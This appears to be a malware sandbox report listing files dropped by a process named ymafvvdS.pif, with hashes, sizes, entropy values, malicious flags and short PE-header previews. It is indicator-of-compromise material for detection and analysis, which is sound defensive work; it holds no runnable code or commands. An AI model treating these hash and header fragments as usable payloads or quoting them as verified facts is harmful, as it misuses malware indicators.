                                                                                                                                                                                                                        SHA-256:3255CE0E15605129CDBCA42C7D53D3B1EAD1FDA4B117273516205DD238A6E86B
                                                                                                                                                                                                                        SHA-512:9050C44349FDD82CFED6778500D957A29161F3164D7B8652CD2CE189B8BFDF342AD3F319825FFDAFF7FAC6F04CC1D7B0A3A2C0DE3293A9B5EDE1E3BF05E4E7E3
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....e&%..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4993536
                                                                                                                                                                                                                        Entropy (8bit):6.809235027242866
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:BlkkCqyDEY7+o3OBvfGVY+40yaHyS+9s/pLHTthF3:3kkCqaE68eV+0yAE6LHTPF3
                                                                                                                                                                                                                        MD5:0EA3838F4AAFC115DB0D59B8BF9A7C97
                                                                                                                                                                                                                        SHA1:2605550B304B1267D5AAE77DED213573BF90CE41
                                                                                                                                                                                                                        SHA-256:AD13C7214814B6FB9738A836683FD6287C1E63F837AEB82DE90123708C839AA9
                                                                                                                                                                                                                        SHA-512:ED19CDF5E4DC9B7B3EB4A72D5DDE626EB9593821B2DD8FB030250B88185BD7DE591C32744A5D73C2E9520306AF57CE5D7C47412E4667DB21247AEBEE83200032
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL......BL......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1168384
                                                                                                                                                                                                                        Entropy (8bit):5.03600894040924
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:pWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:kqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:5D87086611CEF9DC221CEA2BAD088AC5
                                                                                                                                                                                                                        SHA1:9327AE493871D4E25391CED7B49DB4DCC2BA42E6
                                                                                                                                                                                                                        SHA-256:7D4E06A9AF155648F276284C6DA5B101C8F273AFFEB17BD44A40E017565870EC
                                                                                                                                                                                                                        SHA-512:A158B2EC23014A28BAF292639755DDF0266C7D1DB3D00D786495147605A77C9DE746DD5F5DE1C5D5DB9EA861920DF24DC1E26BACC7CAF478844EA0413E4619C9
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@..................................b..................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1522688
                                                                                                                                                                                                                        Entropy (8bit):5.322977763051578
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:5VwACThwSSn2dR1Ntl8WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:5yAAWSS2H1hqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:2E48CA582AA1AC610D8E1D6F7CA5BB5F
                                                                                                                                                                                                                        SHA1:F69FF192FFE0B94C65AD20C1FF5A25AAF7104665
                                                                                                                                                                                                                        SHA-256:17771E5ADF3C51C19964E8EC4927462B8692522041A4677EA1E38886211E936E
                                                                                                                                                                                                                        SHA-512:92C519E7A6406430ADF35AB69E98CF54392451355DB062DC995ECF4FA69255B5F3ACEC18425E7A4A89B7358DA286C721839992B5D667A99AC15FE5D2D02D1CFD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@.................................-...................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1293824
                                                                                                                                                                                                                        Entropy (8bit):5.207352425446388
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:wgd1aFWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:X6IqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:25F4A973057F8FFED81777C26A529198
                                                                                                                                                                                                                        SHA1:217A4553BF785904865F452259839634883D3D64
                                                                                                                                                                                                                        SHA-256:AE7AD73F1976BD4F5FF6C8AE43F163C621AEDEEE09145C07D5F33A2D7FEBBB30
                                                                                                                                                                                                                        SHA-512:BA75A479CAC3CF1A6C5E6D822F99E99C5CC0C283B675EBA13DF5C8B5FBFFD153F1B3BDDAD1C5AC8A01C06A69BEC90736CF5A1F073422BCB0626F5D68900E3303
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@.........................................................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...p.......`...^..............@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1147904
                                                                                                                                                                                                                        Entropy (8bit):5.031426397762276
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:207WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:IqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:1C82A3A8F7A82CEB70AC7803C28A0CE7
                                                                                                                                                                                                                        SHA1:832F879E1546681C9086BCB31205D5AEC373860C
                                                                                                                                                                                                                        SHA-256:940119BFD907B43E8DFE077898D37748CD651AB1F35ED03808CEEEA2DF59C9BE
                                                                                                                                                                                                                        SHA-512:24300B496D226D7CC1D5C6AC67991B25E29B234B955825BE4AED9CB5ED6D936097008D444E8992CE1122682AC0029AF8A2DB8C32CA850385D87D8F15538814AD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@..........................................................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc...P.......@...D..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1418752
                                                                                                                                                                                                                        Entropy (8bit):5.389634412130164
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:/jyposHHrKuZtPvh3FxWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:rAZHHrpZF/8qYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:E22B24BE7711C109DCDD4595DEF82950
                                                                                                                                                                                                                        SHA1:3B1CA67A49447B273A04AA092496AD2C9296E93C
                                                                                                                                                                                                                        SHA-256:51D5DAC9EC7295AF19AFFD435F840984379973D5A6BAB1B04F95DB9CE72AB6CB
                                                                                                                                                                                                                        SHA-512:652028B785015A89FD6210F7C8991C8F6465939012FCDE607137EC4657D13DB41EF3C244D9AEF8FCF9F7BDABF33C7BDEBC4799D91540951F1EE8DBDAFD58E0BD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@.................................. ..........................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...p.......`...F..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):53721600
                                                                                                                                                                                                                        Entropy (8bit):6.543154338139482
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1572864:pNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:pQ9lw68HSq
                                                                                                                                                                                                                        MD5:C7E29AD009BA52C2A28775EBAE2CA9C6
                                                                                                                                                                                                                        SHA1:224295C5516195E92EA723B07A58B8E9620B1848
                                                                                                                                                                                                                        SHA-256:ADFD39250D5356A283423ABD26DC81755C67C5165D53EDC1CA2A784FE0109288
                                                                                                                                                                                                                        SHA-512:79D8E419DF3E3141362DBA9727438BBB44F99C583A1D4EEE89D6A6B00F9365B74C65F952559B2534B5823F27CA9B6F6CC2D82E68D76F9644796D3ACD7254CC7D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9|..8.r.9|..8;r.9|..8.r.9|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5.......3.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):40811520
                                                                                                                                                                                                                        Entropy (8bit):6.461239223220475
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:786432:HbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ay3I5D:HyM8TOtIlPv+msZPH1u5WkID5uceo4qR
                                                                                                                                                                                                                        MD5:3F0F3FA244E0C3C10DCE10334996E2FE
                                                                                                                                                                                                                        SHA1:1BB5A21FD657BF930C5C27824DC90A02F7505406
                                                                                                                                                                                                                        SHA-256:6DC9CBA7AA66895CC0365230156164D4ECC8E75B4201F2A4B7389874B6A863B9
                                                                                                                                                                                                                        SHA-512:6B1331927B5424FDAC783570EAC4A3353A3161F3A555FE6F0EE411A37DC60C0C0B3BB3CE51BEDD599D377B3053BFC8A133D06AAF2018FB3C192A1F48A5902B08
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............sI.....q......q......q......q.....Jy.....Jy.....Jy.............q......q......q......q......q%.....M.....q.....Rich....................PE..L......e............... ............h.......`....@...........................o.....2.n.............................4...^....P..T....`...]>.............................8........................... 5..@............ ..l............................text...P........................... ..`.rdata..8.;.. ....;.................@..@.data....<.......0..................@....detourc.....0......................@..@.c2r....|....P...........................rsrc....]>..`...^>.................@..@.reloc...P....S..@...|S.............@...................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1657344
Entropy (8bit):5.628255544284414
Encrypted:false
SSDEEP:24576:ml8DMeflpnIOvYUrqYdTt/hXV0cfQ9Y4:mqDD9pnIOFqQTt/hXV0cD
MD5:FA6E75CF2D36F88FCAED5D8534F49E4D
SHA1:906C0168CC82F0F129750A48989DB94FD7F79503
SHA-256:51F5A5BA5C68AB21FFF79E35D8B2F7823348F9D720A4EA4F306D88F0C9B6F771
SHA-512:88734CAD41ABBABE5D8A4D3CC8A1A1A9CB1AE703F6B260892839D6F7742A7C162A389EB4E1313B6F6E0514213E635F619119C14E690391BFBB610AB17972A8B7
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4364800
Entropy (8bit):6.745571171794416
Encrypted:false
SSDEEP:49152:3B1sstqMHiq8kBfK9a+cOVE/TqEpEepdkRqqUu9wg6KFYso8l8EqqQTt/hXV0cD:LHzorVmr2gkRpdJYolQTthF3
MD5:2F9CB8D5850066045B3D3B4196FABD67
SHA1:F670442CE414DA3E3006496ED46FC025001AF44A
SHA-256:10C549E582BF05DDE90C18C6205EFBD886C494F4D1EE8524CC522D1CE1156764
SHA-512:B522C9AB634F6719AE2FAECA7ED87D47C99004176B7DE7C2C1B00B58A135B89F32BD3D0B91634D753783615D0007A9E343FE5FE306E076720217197105D22800
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1238528
Entropy (8bit):5.138431932912126
Encrypted:false
SSDEEP:12288:T3w1uVdSEjaWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4v:TEyT1qYdTt/hXV0cfQ9Y4
MD5:9E34CAD530E746649D99A4FFE6ED77EE
SHA1:BAC546E46809CD7F4EE9E97354B6890B8856136B
SHA-256:BB3849A6FE002E37E935492DEFF9F6F3AD32976AB6B2D3AE42F248A881D54FC2
SHA-512:ADB8E223DE25DA72D929373C2651B80A7DF9186D02EA8F28474C4A5F3AF8FA9E629153C2C5653D584F1CFD0AD54F9F0DF2CE8545B22FDF0AB41AC310AD77DA36
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2354176
Entropy (8bit):7.049967410338301
Encrypted:false
SSDEEP:49152:ahDdVrQ95RW0YEHyWQXE/09Val0GKDmg27RnWGj:ahHYW+HyWKVD527BWG
MD5:6A2E9C13C2A578F9FC128F26D48FC3D7
SHA1:B437215D27CC238D9F5341E8D7D073F0DAF03867
SHA-256:841C09112EA918977771E7DA68D4319AB13AF2B99AEFECA99D939D1B47077941
SHA-512:429F6E4660BE669774EACB46191E088EEA9A612AECEE48851D99B37CDBCD1B1558FC710C3D641558C40EA02DF8037B7A42A1CFC12924EB3C03C3D9E6BB93AA3A
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1825280
Entropy (8bit):7.151966600472169
Encrypted:false
SSDEEP:24576:A70E0ZCQZMib6Rrt9RoctGfmdd6qYdTt/hXV0cfQ9Y4:U0EzQS7RPRoc1+qQTt/hXV0cD
MD5:0DCAD7702A47527130D0F4157CD802C7
SHA1:9C221AFA171B605EE54343CD2AC47D559E23D634
SHA-256:E151F1F09814B0A267DDB5770300B9D03646B0E629D0370AA186D329FF0C081C
SHA-512:C08B9D02A87A3E7A058612C9B570402DAEBD712931E8AF39458646B7A4C474D9707263248043229A9BF9B1A379290ED1BD5849B3079E14C210008654B12CFF05
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1847808
Entropy (8bit):7.138939563176706
Encrypted:false
SSDEEP:24576:LiD2VmA1YXiHwlklb8boUuWPg2gBqYdTt/hXV0cfQ9Y4:mD2VmAygwIb8boQKqQTt/hXV0cD
MD5:3AA07553EF10EC5A6ED1FA0C3E06E634
SHA1:4A339459C114209A26425769621556D56544BE6E
SHA-256:25BACB30DA015E1BF544B222B8D1B5E368427B0EF9EFDA537959E9992E63C7B1
SHA-512:53185D87AB36092011B5E583752FAE33319326E00E8A32D1DAC7E7AFC6C90220334594AE03E2F9F1EA9184E97887AECB5C031BB771133D5AB8256DB9B888E04B
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2853376
Entropy (8bit):6.946185399959636
Encrypted:false
SSDEEP:49152:4fD3zO9ZhBGlohzM3HRNr00CqQTt/hXV0cD:SDaalSzM00WTthF3
MD5:C4B1B5103932EB2D97FC0FEF10AD388A
SHA1:EB8B1E7DA196F567FFE9BD87DF01E6781B4B6184
SHA-256:58F24215EB9356C584CC7A7A67E6FAC282E328E45148AB936D12CB2B350F0EE5
SHA-512:AF675C162B797D9ED0759849BDE050630652A6CE0F2443FEDDA2E920ABA1AF1520EA8F26361C79A77185BF7D61149FAEB00753516A5C0934A495EDA41A2F6642
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4320256
Entropy (8bit):6.8216498122615805
Encrypted:false
SSDEEP:49152:mTaRe7mkn5KLvD5qGVC008/pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhtqQTt/hXF:5I72Lvkr4pbxJRoIMeTthF3
MD5:A3C9C84AD26A6A36DA7F87D8DE1BFB18
SHA1:911B189CB92DEE2457DECCBA64204D867069E1AD
SHA-256:F3DBFC93B35BE2FAE2E359DEFE4082B148EA4B8542F4C0165DF9F58E23A10F2C
SHA-512:E10A86AB2953BB3526A731129BD19360B1AFC634B8041F576B5AD9DC50D59C42C2140472DAFDB93A5F885BEE6F74DF5DE6DAA7C61850FC8083E533C1B2AA427A
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C....../B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2062336
Entropy (8bit):7.091440517731825
Encrypted:false
SSDEEP:24576:zW9Jml9mmijxiMnF+ZxmQWcbLw8VqqYdTt/hXV0cfQ9Y4:zWnm5iAMkjmQWkVqqQTt/hXV0cD
MD5:F44A836D4CE4288E293AF445FFB30AC5
SHA1:29244B46BC0DC72A58747FCC7F2CD6A67DFAAABA
SHA-256:8C1B0EA48AAA16DCE080971B35BE77F513C5C52BE28030D55837AB552C42FCD6
SHA-512:3BF5408DE55DA1B031AF818D26465D04EFD264321EDC92659C4B18D7530BEA2351C224CE04DA355AE0D28D9770431C4A50253AA63263A7491679263A3DB71193
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .......... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1801216
Entropy (8bit):7.1598008601936955
Encrypted:false
SSDEEP:24576:dwNHwoYhua6MZERO4qbBJTY6mY1uIggqYdTt/hXV0cfQ9Y4:dwNPdNO7BJTfmETqQTt/hXV0cD
MD5:C9C99CC495C962B8044F23938CF6467C
SHA1:493A6C555DC6784013689A01BE44242B36094F7E
SHA-256:D2D1ECD9EAEE6DA49DE149C1F7128200CE9BBB42D852184B1C290A23A8027D17
SHA-512:4465FFDF51B3B305442797C216114AF153A44AB35F38E1791F7B083944235C733CD49458294682B47CBD8E8DB4EB212F6475B1B70B785E5B2E44BABD0631FCDD
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................Oj.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1847808
Entropy (8bit):7.138944424817521
Encrypted:false
SSDEEP:24576:TiD2VmA1YXiHwlklb8boUuWPg2gBqYdTt/hXV0cfQ9Y4:OD2VmAygwIb8boQKqQTt/hXV0cD
MD5:2E5EC96CB611C26A6FC78F8AB007BA23
SHA1:E4AFC3E575A026331C922C51B179796E9EA0F08D
SHA-256:E8988F5E9F3113BC4D46536254ABF700EBF81A8BB7BD1B1C44B4A1D16FA52840
SHA-512:83640C94203A2BDB392AEB0B99A51228EEB6225A308F7769E0FEC40E8B7CA131A0D8564E492E066581C8273EFB8DB17B058E4685287508952D01799B763802E7
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......Q.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1801216
Entropy (8bit):7.15980380519573
Encrypted:false
SSDEEP:24576:KwNHwoYhua6MZERO4qbBJTY6mY1uIggqYdTt/hXV0cfQ9Y4:KwNPdNO7BJTfmETqQTt/hXV0cD
MD5:B7B8BDCAC6D08E13DCFB07133DE4F565
SHA1:FC8F374E2BDFBA93399BE90A2573B6FB593D5B9D
SHA-256:DFC3C352F252759371C6525310F29284FFA10C436A7D5E49F29EACD027CA959A
SHA-512:5D44125DABBFB10CD48CAA38199390AA86BFA742624A80571030E7004803FB556CDC491FE05B7598B487695E720A7D7CF0C4FDA0BD5F5B72B371598CC77D8BA5
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................y'.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1325568
Entropy (8bit):5.133694455183824
Encrypted:false
SSDEEP:12288:4ALlbRfky6B+mC7WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:4ylbht6BHvqYdTt/hXV0cfQ9Y4
MD5:0004EFB4514028CB9E43867F3A4D275A
SHA1:55391C55B4D1F92B83F19D03113DDE81EEB27FE9
SHA-256:0A8BB0282083F31849E6AC8A2F651A64E00B3CBCDFF60DA78C98CE558CB8CC96
SHA-512:1459A4B7400A55A2B3BC9C27A860BB59F66466E547BC0FB4ED31B1721B61CA872DD2C26AA043A0B6D031918C4D332B54A7C113B3186A1E907B872DF45A26B6B5
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................p.......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1221120
Entropy (8bit):5.130117383941093
Encrypted:false
SSDEEP:12288:ZIkOkTB+w8WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:ZIxkTBVTqYdTt/hXV0cfQ9Y4
MD5:03FE885B9A8C7E4C39E99AEACA78CAB1
SHA1:72CF1E67A1706BC96D68C87FBBAB427023918808
SHA-256:C870ED07388E36BED619ECD6FA430236D0C5C4E651F59B90ACEF6DB46502385E
SHA-512:4B48B1A9066D4F930C577C7FADC65D679019AA9192A73734CFF7FBA9845AB3AAC3860F2F00418A759D9043DB0BB6DBCB0E0D140508B8FB4AB7DFEB072F5570D9
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................o.......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................
